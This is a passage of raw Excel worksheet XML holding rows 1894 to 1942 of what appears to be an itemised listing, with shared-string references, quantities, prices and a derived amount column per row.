        <v>132.11</v>
      </c>
      <c r="J1894" s="15">
        <v>10.568</v>
      </c>
      <c r="K1894" s="16"/>
    </row>
    <row r="1895" spans="2:11">
      <c r="B1895" s="9">
        <v>1929</v>
      </c>
      <c r="C1895" s="238" t="s">
        <v>9902</v>
      </c>
      <c r="D1895" s="238" t="s">
        <v>9903</v>
      </c>
      <c r="E1895" s="238" t="s">
        <v>9904</v>
      </c>
      <c r="F1895" s="9"/>
      <c r="G1895" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1895" s="10">
        <v>5</v>
      </c>
      <c r="I1895" s="14">
        <v>29.91</v>
      </c>
      <c r="J1895" s="15">
        <v>2.392</v>
      </c>
      <c r="K1895" s="16"/>
    </row>
    <row r="1896" spans="2:11">
      <c r="B1896" s="9">
        <v>1930</v>
      </c>
      <c r="C1896" s="238" t="s">
        <v>9905</v>
      </c>
      <c r="D1896" s="238" t="s">
        <v>9906</v>
      </c>
      <c r="E1896" s="238" t="s">
        <v>9907</v>
      </c>
      <c r="F1896" s="9"/>
      <c r="G1896" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1896" s="10">
        <v>4</v>
      </c>
      <c r="I1896" s="14">
        <v>95.73</v>
      </c>
      <c r="J1896" s="15">
        <v>7.6576</v>
      </c>
      <c r="K1896" s="16"/>
    </row>
    <row r="1897" spans="2:11">
      <c r="B1897" s="9">
        <v>1931</v>
      </c>
      <c r="C1897" s="238" t="s">
        <v>9908</v>
      </c>
      <c r="D1897" s="238" t="s">
        <v>9909</v>
      </c>
      <c r="E1897" s="238" t="s">
        <v>9910</v>
      </c>
      <c r="F1897" s="9"/>
      <c r="G1897" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1897" s="10">
        <v>207.5</v>
      </c>
      <c r="I1897" s="14">
        <v>319.59</v>
      </c>
      <c r="J1897" s="15">
        <v>25.564</v>
      </c>
      <c r="K1897" s="16"/>
    </row>
    <row r="1898" spans="2:11">
      <c r="B1898" s="9">
        <v>1932</v>
      </c>
      <c r="C1898" s="238" t="s">
        <v>9911</v>
      </c>
      <c r="D1898" s="238" t="s">
        <v>6563</v>
      </c>
      <c r="E1898" s="238" t="s">
        <v>9912</v>
      </c>
      <c r="F1898" s="9"/>
      <c r="G1898" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1898" s="10">
        <v>5</v>
      </c>
      <c r="I1898" s="14">
        <v>59.83</v>
      </c>
      <c r="J1898" s="15">
        <v>4.788</v>
      </c>
      <c r="K1898" s="16"/>
    </row>
    <row r="1899" spans="2:11">
      <c r="B1899" s="9">
        <v>1933</v>
      </c>
      <c r="C1899" s="238" t="s">
        <v>9913</v>
      </c>
      <c r="D1899" s="238" t="s">
        <v>9914</v>
      </c>
      <c r="E1899" s="238" t="s">
        <v>9915</v>
      </c>
      <c r="F1899" s="9"/>
      <c r="G1899" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1899" s="10">
        <v>2</v>
      </c>
      <c r="I1899" s="14">
        <v>188.03</v>
      </c>
      <c r="J1899" s="15">
        <v>15.0432</v>
      </c>
      <c r="K1899" s="16"/>
    </row>
    <row r="1900" spans="2:11">
      <c r="B1900" s="9">
        <v>1934</v>
      </c>
      <c r="C1900" s="238" t="s">
        <v>9916</v>
      </c>
      <c r="D1900" s="238" t="s">
        <v>7226</v>
      </c>
      <c r="E1900" s="238" t="s">
        <v>9917</v>
      </c>
      <c r="F1900" s="9"/>
      <c r="G1900" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1900" s="10">
        <v>11</v>
      </c>
      <c r="I1900" s="14">
        <v>1065.53</v>
      </c>
      <c r="J1900" s="15">
        <v>85.2456</v>
      </c>
      <c r="K1900" s="16"/>
    </row>
    <row r="1901" spans="2:11">
      <c r="B1901" s="9">
        <v>1935</v>
      </c>
      <c r="C1901" s="238" t="s">
        <v>9918</v>
      </c>
      <c r="D1901" s="238" t="s">
        <v>9919</v>
      </c>
      <c r="E1901" s="238" t="s">
        <v>9920</v>
      </c>
      <c r="F1901" s="9"/>
      <c r="G1901" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1901" s="10">
        <v>2</v>
      </c>
      <c r="I1901" s="14">
        <v>136.74</v>
      </c>
      <c r="J1901" s="15">
        <v>10.9392</v>
      </c>
      <c r="K1901" s="16"/>
    </row>
    <row r="1902" spans="2:11">
      <c r="B1902" s="9">
        <v>1936</v>
      </c>
      <c r="C1902" s="238" t="s">
        <v>9921</v>
      </c>
      <c r="D1902" s="238" t="s">
        <v>9922</v>
      </c>
      <c r="E1902" s="238" t="s">
        <v>9923</v>
      </c>
      <c r="F1902" s="9"/>
      <c r="G1902" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1902" s="10">
        <v>4</v>
      </c>
      <c r="I1902" s="14">
        <v>463.59</v>
      </c>
      <c r="J1902" s="15">
        <v>37.088</v>
      </c>
      <c r="K1902" s="16"/>
    </row>
    <row r="1903" spans="2:11">
      <c r="B1903" s="9">
        <v>1937</v>
      </c>
      <c r="C1903" s="238" t="s">
        <v>9924</v>
      </c>
      <c r="D1903" s="238" t="s">
        <v>9925</v>
      </c>
      <c r="E1903" s="238" t="s">
        <v>9926</v>
      </c>
      <c r="F1903" s="9"/>
      <c r="G1903" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1903" s="10">
        <v>39</v>
      </c>
      <c r="I1903" s="14">
        <v>485.55</v>
      </c>
      <c r="J1903" s="15">
        <v>38.844</v>
      </c>
      <c r="K1903" s="16"/>
    </row>
    <row r="1904" spans="2:11">
      <c r="B1904" s="9">
        <v>1938</v>
      </c>
      <c r="C1904" s="238" t="s">
        <v>9927</v>
      </c>
      <c r="D1904" s="238" t="s">
        <v>9928</v>
      </c>
      <c r="E1904" s="238" t="s">
        <v>9929</v>
      </c>
      <c r="F1904" s="9"/>
      <c r="G1904" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1904" s="10">
        <v>1</v>
      </c>
      <c r="I1904" s="14">
        <v>41.03</v>
      </c>
      <c r="J1904" s="15">
        <v>3.2824</v>
      </c>
      <c r="K1904" s="16"/>
    </row>
    <row r="1905" spans="2:11">
      <c r="B1905" s="9">
        <v>1939</v>
      </c>
      <c r="C1905" s="238" t="s">
        <v>9930</v>
      </c>
      <c r="D1905" s="238" t="s">
        <v>9931</v>
      </c>
      <c r="E1905" s="238" t="s">
        <v>9932</v>
      </c>
      <c r="F1905" s="9"/>
      <c r="G1905" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1905" s="10">
        <v>5</v>
      </c>
      <c r="I1905" s="14">
        <v>277.76</v>
      </c>
      <c r="J1905" s="15">
        <v>22.22</v>
      </c>
      <c r="K1905" s="16"/>
    </row>
    <row r="1906" spans="2:11">
      <c r="B1906" s="9">
        <v>1940</v>
      </c>
      <c r="C1906" s="238" t="s">
        <v>9933</v>
      </c>
      <c r="D1906" s="238" t="s">
        <v>9934</v>
      </c>
      <c r="E1906" s="238" t="s">
        <v>9935</v>
      </c>
      <c r="F1906" s="9"/>
      <c r="G1906" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1906" s="10">
        <v>10</v>
      </c>
      <c r="I1906" s="14">
        <v>136.73</v>
      </c>
      <c r="J1906" s="15">
        <v>10.936</v>
      </c>
      <c r="K1906" s="16"/>
    </row>
    <row r="1907" spans="2:11">
      <c r="B1907" s="9">
        <v>1941</v>
      </c>
      <c r="C1907" s="238" t="s">
        <v>9936</v>
      </c>
      <c r="D1907" s="238" t="s">
        <v>9937</v>
      </c>
      <c r="E1907" s="238" t="s">
        <v>9938</v>
      </c>
      <c r="F1907" s="9"/>
      <c r="G1907" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1907" s="10">
        <v>2</v>
      </c>
      <c r="I1907" s="14">
        <v>111.11</v>
      </c>
      <c r="J1907" s="15">
        <v>8.8896</v>
      </c>
      <c r="K1907" s="16"/>
    </row>
    <row r="1908" spans="2:11">
      <c r="B1908" s="9">
        <v>1942</v>
      </c>
      <c r="C1908" s="238" t="s">
        <v>9939</v>
      </c>
      <c r="D1908" s="238" t="s">
        <v>9940</v>
      </c>
      <c r="E1908" s="238" t="s">
        <v>9941</v>
      </c>
      <c r="F1908" s="9"/>
      <c r="G1908" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1908" s="10">
        <v>5</v>
      </c>
      <c r="I1908" s="14">
        <v>1538.47</v>
      </c>
      <c r="J1908" s="15">
        <v>123.076</v>
      </c>
      <c r="K1908" s="16"/>
    </row>
    <row r="1909" spans="2:11">
      <c r="B1909" s="9">
        <v>1943</v>
      </c>
      <c r="C1909" s="238" t="s">
        <v>9942</v>
      </c>
      <c r="D1909" s="238" t="s">
        <v>9943</v>
      </c>
      <c r="E1909" s="238" t="s">
        <v>9944</v>
      </c>
      <c r="F1909" s="9"/>
      <c r="G1909" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1909" s="10">
        <v>2</v>
      </c>
      <c r="I1909" s="14">
        <v>300</v>
      </c>
      <c r="J1909" s="15">
        <v>24</v>
      </c>
      <c r="K1909" s="16"/>
    </row>
    <row r="1910" spans="2:11">
      <c r="B1910" s="9">
        <v>1944</v>
      </c>
      <c r="C1910" s="238" t="s">
        <v>9945</v>
      </c>
      <c r="D1910" s="238" t="s">
        <v>9946</v>
      </c>
      <c r="E1910" s="238" t="s">
        <v>9947</v>
      </c>
      <c r="F1910" s="9"/>
      <c r="G1910" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1910" s="10">
        <v>1</v>
      </c>
      <c r="I1910" s="14">
        <v>427.35</v>
      </c>
      <c r="J1910" s="15">
        <v>34.188</v>
      </c>
      <c r="K1910" s="16"/>
    </row>
    <row r="1911" spans="2:11">
      <c r="B1911" s="9">
        <v>1945</v>
      </c>
      <c r="C1911" s="238" t="s">
        <v>9948</v>
      </c>
      <c r="D1911" s="238" t="s">
        <v>7588</v>
      </c>
      <c r="E1911" s="238" t="s">
        <v>9949</v>
      </c>
      <c r="F1911" s="9"/>
      <c r="G1911" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H1911" s="10">
        <v>10</v>
      </c>
      <c r="I1911" s="14">
        <v>1794.84</v>
      </c>
      <c r="J1911" s="15">
        <v>143.584</v>
      </c>
      <c r="K1911" s="16"/>
    </row>
    <row r="1912" spans="2:11">
      <c r="B1912" s="9">
        <v>1946</v>
      </c>
      <c r="C1912" s="238" t="s">
        <v>9950</v>
      </c>
      <c r="D1912" s="238" t="s">
        <v>9951</v>
      </c>
      <c r="E1912" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1912" s="238" t="s">
        <v>9952</v>
      </c>
      <c r="G1912" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1912" s="10">
        <v>2</v>
      </c>
      <c r="I1912" s="14">
        <v>385.35</v>
      </c>
      <c r="J1912" s="15">
        <v>61.6576</v>
      </c>
      <c r="K1912" s="16"/>
    </row>
    <row r="1913" spans="2:11">
      <c r="B1913" s="9">
        <v>1947</v>
      </c>
      <c r="C1913" s="238" t="s">
        <v>9953</v>
      </c>
      <c r="D1913" s="238" t="s">
        <v>9954</v>
      </c>
      <c r="E1913" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1913" s="238" t="s">
        <v>9955</v>
      </c>
      <c r="G1913" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1913" s="10">
        <v>4</v>
      </c>
      <c r="I1913" s="14">
        <v>498.4</v>
      </c>
      <c r="J1913" s="15">
        <v>79.744</v>
      </c>
      <c r="K1913" s="16"/>
    </row>
    <row r="1914" spans="2:11">
      <c r="B1914" s="9">
        <v>1948</v>
      </c>
      <c r="C1914" s="238" t="s">
        <v>9956</v>
      </c>
      <c r="D1914" s="238" t="s">
        <v>9957</v>
      </c>
      <c r="E1914" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1914" s="238" t="s">
        <v>9958</v>
      </c>
      <c r="G1914" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1914" s="10">
        <v>3</v>
      </c>
      <c r="I1914" s="14">
        <v>270.69</v>
      </c>
      <c r="J1914" s="15">
        <v>43.3104</v>
      </c>
      <c r="K1914" s="16"/>
    </row>
    <row r="1915" spans="2:11">
      <c r="B1915" s="9">
        <v>1949</v>
      </c>
      <c r="C1915" s="238" t="s">
        <v>9959</v>
      </c>
      <c r="D1915" s="238" t="s">
        <v>9960</v>
      </c>
      <c r="E1915" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1915" s="238" t="s">
        <v>9961</v>
      </c>
      <c r="G1915" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1915" s="10">
        <v>7</v>
      </c>
      <c r="I1915" s="14">
        <v>947.01</v>
      </c>
      <c r="J1915" s="15">
        <v>151.5248</v>
      </c>
      <c r="K1915" s="16"/>
    </row>
    <row r="1916" spans="2:11">
      <c r="B1916" s="9">
        <v>1950</v>
      </c>
      <c r="C1916" s="238" t="s">
        <v>9962</v>
      </c>
      <c r="D1916" s="238" t="s">
        <v>9963</v>
      </c>
      <c r="E1916" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1916" s="238" t="s">
        <v>9964</v>
      </c>
      <c r="G1916" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1916" s="10">
        <v>2</v>
      </c>
      <c r="I1916" s="14">
        <v>362</v>
      </c>
      <c r="J1916" s="15">
        <v>57.92</v>
      </c>
      <c r="K1916" s="16"/>
    </row>
    <row r="1917" spans="2:11">
      <c r="B1917" s="9">
        <v>1951</v>
      </c>
      <c r="C1917" s="238" t="s">
        <v>9965</v>
      </c>
      <c r="D1917" s="238" t="s">
        <v>9966</v>
      </c>
      <c r="E1917" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1917" s="238" t="s">
        <v>9967</v>
      </c>
      <c r="G1917" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1917" s="10">
        <v>4</v>
      </c>
      <c r="I1917" s="14">
        <v>329.6</v>
      </c>
      <c r="J1917" s="15">
        <v>52.736</v>
      </c>
      <c r="K1917" s="16"/>
    </row>
    <row r="1918" spans="2:11">
      <c r="B1918" s="9">
        <v>1952</v>
      </c>
      <c r="C1918" s="238" t="s">
        <v>9968</v>
      </c>
      <c r="D1918" s="238" t="s">
        <v>9969</v>
      </c>
      <c r="E1918" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1918" s="238" t="s">
        <v>9970</v>
      </c>
      <c r="G1918" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1918" s="10">
        <v>7</v>
      </c>
      <c r="I1918" s="14">
        <v>374.2</v>
      </c>
      <c r="J1918" s="15">
        <v>59.8752</v>
      </c>
      <c r="K1918" s="16"/>
    </row>
    <row r="1919" spans="2:11">
      <c r="B1919" s="9">
        <v>1953</v>
      </c>
      <c r="C1919" s="238" t="s">
        <v>9971</v>
      </c>
      <c r="D1919" s="238" t="s">
        <v>9972</v>
      </c>
      <c r="E1919" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1919" s="238" t="s">
        <v>9973</v>
      </c>
      <c r="G1919" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1919" s="10">
        <v>1</v>
      </c>
      <c r="I1919" s="14">
        <v>105</v>
      </c>
      <c r="J1919" s="15">
        <v>16.8</v>
      </c>
      <c r="K1919" s="16"/>
    </row>
    <row r="1920" spans="2:11">
      <c r="B1920" s="9">
        <v>1954</v>
      </c>
      <c r="C1920" s="238" t="s">
        <v>9974</v>
      </c>
      <c r="D1920" s="238" t="s">
        <v>9975</v>
      </c>
      <c r="E1920" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1920" s="238" t="s">
        <v>9976</v>
      </c>
      <c r="G1920" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1920" s="10">
        <v>2</v>
      </c>
      <c r="I1920" s="14">
        <v>110</v>
      </c>
      <c r="J1920" s="15">
        <v>17.6</v>
      </c>
      <c r="K1920" s="16"/>
    </row>
    <row r="1921" spans="2:11">
      <c r="B1921" s="9">
        <v>1955</v>
      </c>
      <c r="C1921" s="238" t="s">
        <v>9977</v>
      </c>
      <c r="D1921" s="238" t="s">
        <v>9978</v>
      </c>
      <c r="E1921" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1921" s="238" t="s">
        <v>9979</v>
      </c>
      <c r="G1921" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1921" s="10">
        <v>1</v>
      </c>
      <c r="I1921" s="14">
        <v>20</v>
      </c>
      <c r="J1921" s="15">
        <v>3.2</v>
      </c>
      <c r="K1921" s="16"/>
    </row>
    <row r="1922" spans="2:11">
      <c r="B1922" s="9">
        <v>1956</v>
      </c>
      <c r="C1922" s="238" t="s">
        <v>9980</v>
      </c>
      <c r="D1922" s="238" t="s">
        <v>9981</v>
      </c>
      <c r="E1922" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1922" s="238" t="s">
        <v>9982</v>
      </c>
      <c r="G1922" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1922" s="10">
        <v>1</v>
      </c>
      <c r="I1922" s="14">
        <v>15</v>
      </c>
      <c r="J1922" s="15">
        <v>2.4</v>
      </c>
      <c r="K1922" s="16"/>
    </row>
    <row r="1923" spans="2:11">
      <c r="B1923" s="9">
        <v>1957</v>
      </c>
      <c r="C1923" s="238" t="s">
        <v>9983</v>
      </c>
      <c r="D1923" s="238" t="s">
        <v>9984</v>
      </c>
      <c r="E1923" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1923" s="238" t="s">
        <v>9985</v>
      </c>
      <c r="G1923" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1923" s="10">
        <v>3</v>
      </c>
      <c r="I1923" s="14">
        <v>40</v>
      </c>
      <c r="J1923" s="15">
        <v>6.3984</v>
      </c>
      <c r="K1923" s="16"/>
    </row>
    <row r="1924" spans="2:11">
      <c r="B1924" s="9">
        <v>1958</v>
      </c>
      <c r="C1924" s="238" t="s">
        <v>9986</v>
      </c>
      <c r="D1924" s="238" t="s">
        <v>9987</v>
      </c>
      <c r="E1924" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1924" s="238" t="s">
        <v>9988</v>
      </c>
      <c r="G1924" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1924" s="10">
        <v>2</v>
      </c>
      <c r="I1924" s="14">
        <v>26.68</v>
      </c>
      <c r="J1924" s="15">
        <v>4.2688</v>
      </c>
      <c r="K1924" s="16"/>
    </row>
    <row r="1925" spans="2:11">
      <c r="B1925" s="9">
        <v>1959</v>
      </c>
      <c r="C1925" s="238" t="s">
        <v>9989</v>
      </c>
      <c r="D1925" s="238" t="s">
        <v>9990</v>
      </c>
      <c r="E1925" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1925" s="238" t="s">
        <v>9991</v>
      </c>
      <c r="G1925" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1925" s="10">
        <v>4</v>
      </c>
      <c r="I1925" s="14">
        <v>32</v>
      </c>
      <c r="J1925" s="15">
        <v>5.12</v>
      </c>
      <c r="K1925" s="16"/>
    </row>
    <row r="1926" spans="2:11">
      <c r="B1926" s="9">
        <v>1960</v>
      </c>
      <c r="C1926" s="238" t="s">
        <v>9992</v>
      </c>
      <c r="D1926" s="238" t="s">
        <v>9993</v>
      </c>
      <c r="E1926" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1926" s="238" t="s">
        <v>9994</v>
      </c>
      <c r="G1926" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1926" s="10">
        <v>11</v>
      </c>
      <c r="I1926" s="14">
        <v>102</v>
      </c>
      <c r="J1926" s="15">
        <v>16.3152</v>
      </c>
      <c r="K1926" s="16"/>
    </row>
    <row r="1927" spans="2:11">
      <c r="B1927" s="9">
        <v>1961</v>
      </c>
      <c r="C1927" s="238" t="s">
        <v>9995</v>
      </c>
      <c r="D1927" s="238" t="s">
        <v>9996</v>
      </c>
      <c r="E1927" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1927" s="238" t="s">
        <v>9997</v>
      </c>
      <c r="G1927" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1927" s="10">
        <v>1</v>
      </c>
      <c r="I1927" s="14">
        <v>34.12</v>
      </c>
      <c r="J1927" s="15">
        <v>5.4592</v>
      </c>
      <c r="K1927" s="16"/>
    </row>
    <row r="1928" spans="2:11">
      <c r="B1928" s="9">
        <v>1962</v>
      </c>
      <c r="C1928" s="238" t="s">
        <v>9998</v>
      </c>
      <c r="D1928" s="238" t="s">
        <v>9999</v>
      </c>
      <c r="E1928" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1928" s="238" t="s">
        <v>10000</v>
      </c>
      <c r="G1928" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1928" s="10">
        <v>7</v>
      </c>
      <c r="I1928" s="14">
        <v>254.53</v>
      </c>
      <c r="J1928" s="15">
        <v>40.7232</v>
      </c>
      <c r="K1928" s="16"/>
    </row>
    <row r="1929" spans="2:11">
      <c r="B1929" s="9">
        <v>1963</v>
      </c>
      <c r="C1929" s="238" t="s">
        <v>10001</v>
      </c>
      <c r="D1929" s="238" t="s">
        <v>10002</v>
      </c>
      <c r="E1929" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1929" s="238" t="s">
        <v>10003</v>
      </c>
      <c r="G1929" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1929" s="10">
        <v>1</v>
      </c>
      <c r="I1929" s="14">
        <v>30</v>
      </c>
      <c r="J1929" s="15">
        <v>4.8</v>
      </c>
      <c r="K1929" s="16"/>
    </row>
    <row r="1930" spans="2:11">
      <c r="B1930" s="9">
        <v>1964</v>
      </c>
      <c r="C1930" s="238" t="s">
        <v>10004</v>
      </c>
      <c r="D1930" s="238" t="s">
        <v>10005</v>
      </c>
      <c r="E1930" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1930" s="238" t="s">
        <v>10006</v>
      </c>
      <c r="G1930" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1930" s="10">
        <v>2</v>
      </c>
      <c r="I1930" s="14">
        <v>30</v>
      </c>
      <c r="J1930" s="15">
        <v>4.8</v>
      </c>
      <c r="K1930" s="16"/>
    </row>
    <row r="1931" spans="2:11">
      <c r="B1931" s="9">
        <v>1965</v>
      </c>
      <c r="C1931" s="238" t="s">
        <v>10007</v>
      </c>
      <c r="D1931" s="238" t="s">
        <v>10008</v>
      </c>
      <c r="E1931" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1931" s="238" t="s">
        <v>10009</v>
      </c>
      <c r="G1931" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1931" s="10">
        <v>1</v>
      </c>
      <c r="I1931" s="14">
        <v>13</v>
      </c>
      <c r="J1931" s="15">
        <v>2.08</v>
      </c>
      <c r="K1931" s="16"/>
    </row>
    <row r="1932" spans="2:11">
      <c r="B1932" s="9">
        <v>1966</v>
      </c>
      <c r="C1932" s="238" t="s">
        <v>10010</v>
      </c>
      <c r="D1932" s="238" t="s">
        <v>10011</v>
      </c>
      <c r="E1932" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1932" s="238" t="s">
        <v>10012</v>
      </c>
      <c r="G1932" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1932" s="10">
        <v>1</v>
      </c>
      <c r="I1932" s="14">
        <v>5.66</v>
      </c>
      <c r="J1932" s="15">
        <v>0.9056</v>
      </c>
      <c r="K1932" s="16"/>
    </row>
    <row r="1933" spans="2:11">
      <c r="B1933" s="9">
        <v>1967</v>
      </c>
      <c r="C1933" s="238" t="s">
        <v>10013</v>
      </c>
      <c r="D1933" s="238" t="s">
        <v>10014</v>
      </c>
      <c r="E1933" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1933" s="238" t="s">
        <v>10015</v>
      </c>
      <c r="G1933" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1933" s="10">
        <v>1</v>
      </c>
      <c r="I1933" s="14">
        <v>20.87</v>
      </c>
      <c r="J1933" s="15">
        <v>3.3392</v>
      </c>
      <c r="K1933" s="16"/>
    </row>
    <row r="1934" spans="2:11">
      <c r="B1934" s="9">
        <v>1968</v>
      </c>
      <c r="C1934" s="238" t="s">
        <v>10016</v>
      </c>
      <c r="D1934" s="238" t="s">
        <v>10017</v>
      </c>
      <c r="E1934" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1934" s="238" t="s">
        <v>10018</v>
      </c>
      <c r="G1934" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1934" s="10">
        <v>3</v>
      </c>
      <c r="I1934" s="14">
        <v>93</v>
      </c>
      <c r="J1934" s="15">
        <v>14.88</v>
      </c>
      <c r="K1934" s="16"/>
    </row>
    <row r="1935" spans="2:11">
      <c r="B1935" s="9">
        <v>1969</v>
      </c>
      <c r="C1935" s="238" t="s">
        <v>10019</v>
      </c>
      <c r="D1935" s="238" t="s">
        <v>10020</v>
      </c>
      <c r="E1935" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1935" s="238" t="s">
        <v>10021</v>
      </c>
      <c r="G1935" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1935" s="10">
        <v>1</v>
      </c>
      <c r="I1935" s="14">
        <v>274.36</v>
      </c>
      <c r="J1935" s="15">
        <v>43.8976</v>
      </c>
      <c r="K1935" s="16"/>
    </row>
    <row r="1936" spans="2:11">
      <c r="B1936" s="9">
        <v>1970</v>
      </c>
      <c r="C1936" s="238" t="s">
        <v>10022</v>
      </c>
      <c r="D1936" s="238" t="s">
        <v>10023</v>
      </c>
      <c r="E1936" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1936" s="238" t="s">
        <v>10024</v>
      </c>
      <c r="G1936" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1936" s="10">
        <v>2</v>
      </c>
      <c r="I1936" s="14">
        <v>24</v>
      </c>
      <c r="J1936" s="15">
        <v>3.84</v>
      </c>
      <c r="K1936" s="16"/>
    </row>
    <row r="1937" spans="2:11">
      <c r="B1937" s="9">
        <v>1971</v>
      </c>
      <c r="C1937" s="238" t="s">
        <v>10025</v>
      </c>
      <c r="D1937" s="238" t="s">
        <v>10026</v>
      </c>
      <c r="E1937" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1937" s="238" t="s">
        <v>10027</v>
      </c>
      <c r="G1937" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1937" s="10">
        <v>1</v>
      </c>
      <c r="I1937" s="14">
        <v>17</v>
      </c>
      <c r="J1937" s="15">
        <v>2.72</v>
      </c>
      <c r="K1937" s="16"/>
    </row>
    <row r="1938" spans="2:11">
      <c r="B1938" s="9">
        <v>1972</v>
      </c>
      <c r="C1938" s="238" t="s">
        <v>10028</v>
      </c>
      <c r="D1938" s="238" t="s">
        <v>10029</v>
      </c>
      <c r="E1938" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1938" s="238" t="s">
        <v>10030</v>
      </c>
      <c r="G1938" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1938" s="10">
        <v>1</v>
      </c>
      <c r="I1938" s="14">
        <v>38.4</v>
      </c>
      <c r="J1938" s="15">
        <v>6.144</v>
      </c>
      <c r="K1938" s="16"/>
    </row>
    <row r="1939" spans="2:11">
      <c r="B1939" s="9">
        <v>1973</v>
      </c>
      <c r="C1939" s="238" t="s">
        <v>10031</v>
      </c>
      <c r="D1939" s="238" t="s">
        <v>10032</v>
      </c>
      <c r="E1939" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1939" s="238" t="s">
        <v>10033</v>
      </c>
      <c r="G1939" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1939" s="10">
        <v>4</v>
      </c>
      <c r="I1939" s="14">
        <v>114.66</v>
      </c>
      <c r="J1939" s="15">
        <v>18.3488</v>
      </c>
      <c r="K1939" s="16"/>
    </row>
    <row r="1940" spans="2:11">
      <c r="B1940" s="9">
        <v>1974</v>
      </c>
      <c r="C1940" s="238" t="s">
        <v>10034</v>
      </c>
      <c r="D1940" s="238" t="s">
        <v>10035</v>
      </c>
      <c r="E1940" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1940" s="238" t="s">
        <v>10036</v>
      </c>
      <c r="G1940" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1940" s="10">
        <v>2</v>
      </c>
      <c r="I1940" s="14">
        <v>65.15</v>
      </c>
      <c r="J1940" s="15">
        <v>10.4256</v>
      </c>
      <c r="K1940" s="16"/>
    </row>
    <row r="1941" spans="2:11">
      <c r="B1941" s="9">
        <v>1975</v>
      </c>
      <c r="C1941" s="238" t="s">
        <v>10037</v>
      </c>
      <c r="D1941" s="238" t="s">
        <v>10038</v>
      </c>
      <c r="E1941" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1941" s="238" t="s">
        <v>10039</v>
      </c>
      <c r="G1941" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1941" s="10">
        <v>5</v>
      </c>
      <c r="I1941" s="14">
        <v>132</v>
      </c>
      <c r="J1941" s="15">
        <v>21.12</v>
      </c>
      <c r="K1941" s="16"/>
    </row>
    <row r="1942" spans="2:11">
      <c r="B1942" s="9">
        <v>1976</v>
      </c>
      <c r="C1942" s="238" t="s">
        <v>10040</v>
      </c>
      <c r="D1942" s="238" t="s">
        <v>10041</v>
      </c>
      <c r="E1942" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1942" s="238" t="s">
        <v>10042</v>
      </c>
      <c r="G1942" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1942" s="10">
        <v>2</v>
      </c>
      <c r="I1942" s="14">
        <v>210</v>
      </c>
